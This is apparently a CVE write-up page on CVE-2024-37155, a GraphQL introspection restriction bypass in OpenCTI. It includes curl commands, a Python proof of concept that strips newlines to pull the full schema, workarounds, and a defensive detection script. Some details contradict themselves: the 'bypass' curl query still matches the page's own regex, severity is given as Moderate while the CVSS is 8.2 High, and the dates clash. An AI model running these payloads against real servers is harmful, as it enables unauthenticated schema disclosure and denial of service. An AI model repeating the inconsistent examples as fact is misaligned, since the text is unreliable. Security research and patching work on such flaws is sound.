OpenCTI GraphQL Introspection Restriction Bypass, CVE-2024-37155 (Moderate) -DC-Jun2026-542


How CVE-2024-37155 Works

OpenCTI is an open-source platform for managing cyber threat intelligence knowledge and observables. To secure its GraphQL API, OpenCTI implements a `secureIntrospectionPlugin` that validates incoming queries. This plugin uses a regular expression (regex) to detect and block GraphQL Introspection queries — a feature that allows clients to query the schema for available types, fields, and operations.
The vulnerability, present in all versions prior to 6.1.9, exists because the regex validation logic can be trivially bypassed. The plugin’s regex pattern fails to account for specific whitespace characters — namely carriage return (\r) and line feed (\n) characters. By simply removing these characters from an Introspection query, an unauthenticated attacker can evade the security control entirely.
For example, running a `curl` command with a standard Introspection query against a vulnerable instance returns only a limited error message because the query is blocked. However, when the same Introspection query is submitted without the `\r\n` sequences, the plugin fails to match the regex pattern, and the server processes the query successfully. This allows the attacker to retrieve the full GraphQL schema, exposing every query, mutation, subscription, type, and field available on the endpoint.
Armed with this schema information, an attacker gains deep insight into the API’s attack surface, including which mutations can be used to create, update, or delete data, and which queries can be used to read sensitive information. Furthermore, Introspection queries are computationally expensive; repeatedly sending them can lead to resource exhaustion, effectively causing a Denial of Service (DoS). The issue is addressed in OpenCTI version 6.1.9, which patches the regex validation.

DailyCVE Form

| Field | Value |
| :--- | :--- |
| Platform | OpenCTI-Platform |
| Version | < 6.1.9 |
| Vulnerability | Introspection Bypass |
| Severity | Moderate |
| Date | 2024-11-18 |
| Prediction | Already Patched |

What Undercode Say: Analytics

The vulnerability stems from improper input sanitization in the `secureIntrospectionPlugin`. The regex pattern fails to account for `\r` and `\n`, allowing attackers to craft payloads that bypass validation. The following technical analysis demonstrates the exploitation:

Vulnerable Regex Logic (Conceptual):

```javascript
// The plugin likely uses a pattern similar to:
const introspectionPattern = /(\s__schema\s|\s__type\s)/;
// The pattern requires whitespace on both sides of the keyword, so it fails to
// match a query such as "{__schema" once the surrounding \r\n has been removed.
```

Curl Command – Blocked Request (Limited Error):

```bash
curl -X POST http://localhost:8080/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query { __schema { types { name } } }"}'
```

Response: limited error message (query blocked).

Curl Command – Bypass Request (Full Introspection):

```bash
# Removing the \r\n characters allows the query to pass the regex check
curl -X POST http://localhost:8080/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query { __schema { types { name fields { name } } } }"}'
```

Response: full GraphQL schema disclosure.

Python Proof of Concept:

```python
import requests

url = "http://localhost:8080/graphql"

# The query is deliberately written without indentation: once the newlines are
# removed, no whitespace is left around "__schema", which the conceptual regex
# above depends on.
introspection_query = """
query {
__schema {
types {
name
fields {
name
type {
name
kind
}
}
}
}
}
"""

# The plugin's regex is bypassed by removing \r and \n
payload = {"query": introspection_query.replace("\n", "").replace("\r", "")}
response = requests.post(url, json=payload)
print(response.json())
```

Exploit

An unauthenticated attacker can exploit this vulnerability by sending a crafted GraphQL Introspection query that omits all carriage return (\r) and line feed (\n) characters. The `secureIntrospectionPlugin`'s regex pattern fails to detect the sanitized query, allowing the server to process it and return the complete GraphQL schema. This schema reveals all available queries, mutations, subscriptions, types, and fields, effectively mapping the entire API attack surface. Attackers can then use this information to craft unauthorized queries or mutations to read or modify data. Additionally, repeated Introspection queries can overwhelm the server, leading to a Denial of Service (DoS) condition.

Protection

Upgrade: The primary and most effective mitigation is to upgrade to OpenCTI version 6.1.9 or later, which includes a patch that corrects the regex validation.

Workaround (if upgrade is not immediately possible):

  • Implement a Web Application Firewall (WAF) or reverse proxy rule to block requests containing GraphQL Introspection keywords (e.g., __schema, __type) before they reach the OpenCTI application.
  • Restrict network access to the GraphQL endpoint, allowing only trusted IP addresses or internal networks.
  • Monitor logs for unusual or repeated Introspection queries and block offending IP addresses.
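The conceptual regex shown in the analytics section and the WAF rule suggested in the first workaround both hinge on the same question: how to recognise an introspection request regardless of how its whitespace is laid out. The following added example (not OpenCTI's code, and not the plugin's real implementation) places the whitespace-dependent check beside a token-aware one and runs both over constructed sample queries, including one with newlines removed in the manner this page describes.

```javascript
// Added example (not OpenCTI's code): the whitespace-dependent check the
// write-up describes, beside a token-aware check that does not depend on
// how the query text is laid out.

// Conceptual pattern from the write-up: it needs whitespace on BOTH sides of
// the keyword, so "{__schema" (newlines removed, no indentation) is missed.
const WEAK_PATTERN = /(\s__schema\s|\s__type\s)/;

function weakIsIntrospection(query) {
  return WEAK_PATTERN.test(query);
}

// Hardened variant. Strings and comments are removed first, because the
// GraphQL parser never treats their contents as field names: a string
// argument or a "# ..." comment mentioning __schema must not trip the check.
// Strings go first so a "#" inside a string is not mistaken for a comment.
function stripStringsAndComments(query) {
  return query
    .replace(/"""[\s\S]*?"""/g, '""')      // block strings
    .replace(/"(?:\\.|[^"\\\n])*"/g, '""') // ordinary strings
    .replace(/#[^\r\n]*/g, '');            // comments run to end of line
}

// \b treats "_" as a word character, so "{__schema{" matches while the
// legitimate meta-field "__typename" does not ("__type" is not a whole token).
const STRONG_PATTERN = /\b__(schema|type)\b/;

function hardenedIsIntrospection(query) {
  return STRONG_PATTERN.test(stripStringsAndComments(query));
}

// Constructed sample queries (not captured traffic), laid out like the PoC on
// this page: no indentation, so stripping newlines leaves "{__schema".
const MULTILINE = 'query {\n__schema {\ntypes { name }\n}\n}';
const STRIPPED = MULTILINE.replace(/[\r\n]/g, '');
const MINIFIED = '{__schema{types{name}}}';
const BENIGN = 'query {\nme { id __typename }\n}';
const DECOY = 'query {\nreport(id: "__schema") { name } # see __type\n}';

function classify(query) {
  return { weak: weakIsIntrospection(query), hardened: hardenedIsIntrospection(query) };
}

for (const [label, q] of Object.entries({ MULTILINE, STRIPPED, MINIFIED, BENIGN, DECOY })) {
  console.log(label.padEnd(9), classify(q));
}
```

Text matching of any kind remains an approximation; graphql-js ships `NoSchemaIntrospectionCustomRule`, a validation rule that rejects `__schema` and `__type` selections on the parsed AST, which removes the layout dependence entirely.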

Impact

  • Information Disclosure: Attackers can retrieve the entire GraphQL schema without authentication, exposing all available operations and data structures.
  • Unauthorized Data Access: With schema knowledge, attackers can craft queries to read sensitive information they are not authorized to access.
  • Denial of Service (DoS): Introspection queries are resource-intensive; repeated exploitation can exhaust server resources and cause service disruption.
  • CVSS Score: 8.2 (High) – Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H.


Sources:

Reported By: github.com